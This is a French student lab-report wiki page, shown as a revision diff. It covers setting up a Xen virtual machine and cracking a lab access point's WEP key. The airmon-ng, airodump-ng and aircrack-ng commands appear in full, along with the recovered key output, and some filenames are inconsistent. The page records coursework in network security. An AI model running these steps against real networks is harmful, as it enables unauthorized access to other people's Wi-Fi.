TP sysres IMA5sc 2019/2020 G6 : Différence entre versions
(→cassage de la clef WEP d'un point d'accès Wifi) |
(→cassage de la clef WEP d'un point d'accès Wifi) |
||
Ligne 17 : | Ligne 17 : | ||
===cassage de la clef WEP d'un point d'accès Wifi=== | ===cassage de la clef WEP d'un point d'accès Wifi=== | ||
− | Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI. | + | Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI. J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs. |
− | + | je crée ensuite l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer. | |
− | |||
− | je | ||
Pour créer cet interface je lance la commande: | Pour créer cet interface je lance la commande: | ||
airmon-ng start wlan0mon | airmon-ng start wlan0mon | ||
+ | |||
Ensuite j'observe les BSSID qui circulent sur le réseau: | Ensuite j'observe les BSSID qui circulent sur le réseau: | ||
airodump-ng --encrypt wep wlan0mon | airodump-ng --encrypt wep wlan0mon |
Version du 25 novembre 2019 à 22:38
Sommaire
1ère séance
Choix du nom de domaine
Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.
Installation de la machine virtuelle Xen
Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande suivante
xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen
le paramètre hostname spécifie le nom de ma machine(blennoragie) et les disques virtuels sont stockés dans le repertoire(/usr/local/xen):
L'adresse MAC obtenue est : 00:16:3E:D6:E1:DF
2ème séance
cassage de la clef WEP d'un point d'accès Wifi
Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI. J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs.
je crée ensuite l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer.
Pour créer cet interface je lance la commande:
airmon-ng start wlan0mon
Ensuite j'observe les BSSID qui circulent sur le réseau:
airodump-ng --encrypt wep wlan0mon
Je copie les paquets qui circulent sur cracotte06 et je les sauvegardent dans mon fichier craquage.txt
airodump-ng craquag.txt -c 2 --bssid 04:DA:D2:9C:50:55 wlan0mon
Enfin je réalise le cassage de la clef:
aircrack-ng craquage.txt.cap
Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris 5 minutes.
KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99] Decrypted correctly:100%
4eme seance
5ème seance
2ème séance
cassage de la clef WEP d'un point accès Wifi